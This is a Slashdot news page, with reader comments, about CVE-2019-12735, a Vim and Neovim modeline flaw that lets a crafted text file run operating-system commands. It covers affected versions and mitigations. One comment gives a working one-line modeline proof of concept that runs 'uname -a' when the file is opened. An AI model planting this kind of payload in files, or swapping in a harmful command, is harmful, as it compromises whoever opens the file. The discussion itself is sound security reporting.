Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Bug Security Linux

Vim and Neo Editors Vulnerable To High-Severity Bug (threatpost.com) 76

JustAnotherOldGuy quotes Threatpost: A high-severity bug impacting two popular command-line text editing applications, Vim and Neovim, allow remote attackers to execute arbitrary OS commands. Security researcher Armin Razmjou warned that exploiting the bug is as easy as tricking a target into clicking on a specially crafted text file in either editor. Razmjou outlined his research and created a proof-of-concept (PoC) attack demonstrating how an adversary can compromise a Linux system via Vim or Neowim. He said Vim versions before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code execution...

Vim and Neovim have both released patches for the bug (CVE-2019-12735) that the National Institute of Standards and Technology warns, "allows remote attackers to execute arbitrary OS commands via the :source! command in a modeline."

"Beyond patching, it's recommended to disable modelines in the vimrc (set nomodeline), to use the securemodelinesplugin, or to disable modelineexpr (since patch 8.1.1366, Vim-only) to disallow expressions in modelines," the researcher said.

This discussion has been archived. No new comments can be posted.

Vim and Neo Editors Vulnerable To High-Severity Bug

Comments Filter:
  • by habig ( 12787 ) on Saturday June 15, 2019 @12:39PM (#58767924) Homepage
    I thought the whole point of vi was to be mouse-free...
    • by Anonymous Coward

      vim stands for "vi improved", which apparently means lots of clicki and bunti added.

      (Me, I can't stand the thing so I stick to nvi.)

      Also, EditorDavid: That's "vim and neovim", not "vim and neo"; neo is something different again. Please for to fixing.

    • by MrKaos ( 858439 )

      I thought the whole point of vi was to be mouse-free...

      Not necessarily. When I combine vim with a mouse I can highlight text and instantly middle button paste it into a cw (change word), a search, or a regex in vim. That means I can also have secondary cut/paste buffers between Neo/Vim and say Firefox when I use ctrl C/V.

      So for example if I'm using vim I can set up a regex that looks for Bram with a middle click looks for an occurrence of Moolenaar with a UI paste then replaces it with da man so:

      :g/Bram/ s/Moolenaar/da man/gc

      It means less keyboard and mous

  • by paulatz ( 744216 ) on Saturday June 15, 2019 @12:39PM (#58767930)

    "exploiting the bug is as easy as tricking a target into clicking on a specially crafted text file"

    I've been using vim for more than 20 years, I have never once clicked it on a file, whatever that may mean

    • by 93 Escort Wagon ( 326346 ) on Saturday June 15, 2019 @01:37PM (#58768172)

      I've been using vim for more than 20 years, I have never once clicked it on a file, whatever that may mean

      What it means is - the Threatpost author is a Windows user who conflates “opening” with “clicking”. What the reasearcher actually wrote is:

      “Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code execution via modelines by opening a specially crafted text file.”

    • by dissy ( 172727 )

      I've been using vim for more than 20 years, I have never once clicked it on a file, whatever that may mean


      [ESC] :%s~click on file~execute vim with argv1 parameter being an existing text file~g [Enter]

      That should help

  • Yes, you can execute commands from within vim, or any vi like editor. It is part of the basic workflow. Disabling this functionality would disrupt many peopleâ(TM)s basic workflow. Also these commands are all executed as the user.
  • This is why emacs is my OS, I mean text editor. ;-)
  • Be careful, make sure that modeline is turned off!
    • by Anonymous Coward

      This [fandom.com] says

      Vim executes a modeline only if all of the following apply:

      'modeline' is set to "modeline" (not "nomodeline")
      'modelines' is set to a positive integer (not "0")
      You are not root.

      Captcha: doomed
      This [stackoverflow.com] says that as of MacOS 10.12.5 /usr/share/vim/vimrc says

      " Configuration file for vim
      set modelines=0 " CVE-2007-2438

      Ergo, modelines is note a postive integer so it won't work.

      If you have a Mac, test it and see what happens.

  • by xarragon ( 944172 ) on Saturday June 15, 2019 @01:14PM (#58768074)

    This really IS a working exploit which has NOTHING to do with clicking. Simply paste this line into a text file and open it in vim; it will execute uname -a as your user:

    :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

    Source: https://github.com/numirias/se... [github.com]

    You need to add this to your vimrc or upgrade vim to fix it:

    set modelines=0
    set nomodeline

    Fancier versions will replace the vim buffer contents so the exploit code is not visible once opened.

    • by Aighearach ( 97333 ) on Saturday June 15, 2019 @03:50PM (#58768836)

      If you want to check if you're vulnerable by default, you can do:
      :set modeline?

      From inside vim and if it says "nomodeline" then you're safe.

      For example, I checked on Fedora 23 and Centos 7.5 and they're not vulnerable unless you take some action to turn on modeline.

      • Re: (Score:2, Informative)

        by Anonymous Coward

        "Debian, Ubuntu, Gentoo, OSX, etc. by default disable modelines for security reasons." -- Modeline magic [fandom.com]. Ie, paranoia about possibly abuse-able features sometimes pays off.

    • by Anonymous Coward

      Fortunately, ed is the standard editor.

  • They tried to craft the same attack in Emacs, but gave up when they realized they could not determine where Emacs ended and the OS began.

    Well that and they forgot to enter M-x open-attack-vector-mode

  • by Anonymous Coward

    do people really load unknown files in their text editor without looking at them with something like "less -S" first?

  • by pi_rules ( 123171 ) on Saturday June 15, 2019 @01:33PM (#58768144)

    That's it! I'm ditching vim for VSCode!

    (Actually with the new remote connection tools that let you edit over ssh and the vim plugin VSCode makes a decent Python editor. I -am- actually using it these days here and there. I still find myself in vim a lot though, sometimes even in the terminal session inside VSCode.)

  • The vi vs emacs war is getting out of hand...

  • Both vi(m) and emacs suck and there are countless better text editors and IDEs and so on, they can't do the job as well as a good IDE, and no Sublime Text isn't even on my radar despite the weird cultish claims. That doesn't mean they aren't useful, hell, in the last 25 years I've had to use vi countless times to edit things, largely so I can prep a system to install a better text editor before moving on.

    Other than that nano/pico, ee, PhpStorm, IntelliJ IDEA, and RubyMine pretty much cover everything very
    • I usually have a vim-plugin in my Eclipse IDE ... have to check if there is one for IntelliJ.

      Nano and pico are as text editors simply to primitiv, but ok for casual users.

      Putting IDEs in graphical environments together with console based text editors makes not much sense anyway. I guess if you would configure vim correctly (like x-tags, where x is your language), it would be nearly as powerful as a real IDE. For IDE work, and much more powerful for text work.

      • Honest question: I've heard about people using vim plugins in GUI IDEs, what benefits do you see in general, and is it a way to avoid using the mouse or is it a visual thing? I've never installed one.
        • It is simply the commands.

          Everything is done with a keyboard short cut which you actually can memorize.

          f-) ...f means find, I put a ')' so the command jumps to the next closing ) in the same line

          The first thing is always "what" you want to do as in find/delete/insert/change
          The second part refers to a "movement" or "text snippet" as in word, line or a character.

          d means delete
          dd deletes a line - simply doubelling the first char always refers to a line

          And now comes one of the fine things:
          d-f-)

          D, for delete. So

          • I'm not an expert on vim, but why isn't find also / or n as it is in vim. Is it just a similar style of commands and control rather than being a sort of vim command overlay for shortcuts?
            • f finds the next occurrence of the next character you type on the line you're already on.

              / will search from where you are through the rest of the file for a string or regex pattern

        • by Anonymous Coward

          The first thing is that the Vim keyboard shortcuts are simple yet modular. When you learn it properly, it's like learning a special language for communicating with your text editor. For instance "ci(" means "change inside ()", which deletes all text within the nearest enclosing parentheses, and places you into input mode. Other examples are "dt)" for "delete till )", "vip" for "visual selection inside paragraph", and "d3j" which means "delete three lines below" . Once you learn the basics, you can accomplis

    • by caseih ( 160668 )

      Thank goodness most IDEs support plugins that give me VIM keybindings!

      I'm not fast or slow using vim. I'm just comfortable. And that makes me more productive. Why do I need to care about your evidence?

      When I was first learning vim, I remember watching someone who'd used vi for 30 years edit some code and it was pretty impressive. Especially the speed at which he could cut and paste without using a mouse. Occasionally I'd ask him how he did things and he'd say, you know I'm not sure. And then he'd do it r

      • I didn't provide any evidence at all. But something that did happen in reality is I actually replied to another person in this thread with questions about vim plugins, because I am curious about why people use them, the purpose, the benefits, etc. Sure blog posts out there which are rewrites of other blog posts will provide vague anecdotes, but I have enough of those in my own life. You did provide me with some useful information though.
        • by caseih ( 160668 )

          I don't think VI-like editing is for everyone. But for some it becomes rather comfortable. I really like having two modes. I love that I can yank words and lines and repaste them so quickly in ViM. I love how commands can be modified in similar ways to repeat them. For example, y6 will yank (copy) 6 lines of text. Knowing that, and knowing that dd deletes a line of text, it's not surprising that d6 will delete 6 lines of text.

          I love how when my cursor is in the middle of a line and I want to insert text

      • Occasionally I'd ask him how he did things and he'd say, you know I'm not sure. And then he'd do it real slow so we could see what was going on.

        Lol, okay that gave me a chuckle.

        Yeah, I feel the same way with some tools- I'm banging along and someone says, wait, what command did you just use? and I'm like "ummmm, I don't know, let me do it again."

        • by johnw ( 3725 )

          I had a similar experience the other day.

          I do most of my programming on a completely blank keyboard - no legends on any of the keys. I don't look at it, I just use it.

          The only thing which trips me up is typing unfamiliar passwords. There's a big tendency to look at the keyboard, and if I do that then I'm lost. If I can remember to type it without looking down then I'm fine.

          The other day a question came up in a quiz - "Which key is to the right of Z?" - and I hadn't a clue. I couldn't even tell you where

    • I remember hearing about the vi vs emacs thing back on Usenet so long ago, and I didn't understand it then, and I especially don't get it now..

      I mostly use modern editors as I use Xcode.

      But even now I HAVE to switch back to Emacs sometimes because no other editor is as capable. If you want to load very, very large files and look through the contents in hex Emacs is where you go. If you want to edit multiple sections of a document (or maybe across several documents) there is absolutely nothing like the Ema

      • Well I didn't want to start a whole thing and wanted my bias to clearly be hating both, but out of the two, I always did like emacs better, but I could never find a real good use case for it, for myself at least, and as I said I only used vi(m) out of necessity on Unix or Linux.
      • by jimbo ( 1370 )

        Yes! The EMacs macro recording is a gift from the great FSM, praised be His Noodly Appendages!

        I was disappointed to see that the so called programming editor Atom doesn't support macro recording. Well, that was years ago, maybe they've smartened up by now...

    • by gweihir ( 88907 )

      You make absolute statements that make no sense. Are you a fanatic? Because you very much sound like one.

      To sane people, which editor to use is a personal choice, and decidedly not _your_ choice.

      • Are you a fanatic? Because you very much sound like one.

        Yes.

        To sane people, which editor to use is a personal choice, and decidedly not _your_ choice.

        No shit, I never said it wasn't a personal choice, and nice nonsensical statement claiming that it's not my choice what people use, that's just weak politician-style bullshit jargon speak to always win an argument. it's pretty clear that from what I said and my follow up comments that it's my opinion.

        I'm sorry you couldn't understand it, even though other people who replied clearly could, so maybe you should work on that, or should I say "you must work on that" so that your next reply won't read like a

  • This attack requires user assistance to execute the attack code and at that time it is a _local_ attack. This Razmjou guy seems to be pretty incompetent.

    • The fact that he wrote "tricking a target into clicking on a specially crafted text file" didn't give it away first?

      • by gweihir ( 88907 )

        The fact that he wrote "tricking a target into clicking on a specially crafted text file" didn't give it away first?

        It did. But it could have been an incompetent submitter, not the original person of limited insight.

You know you've landed gear-up when it takes full power to taxi.

Working...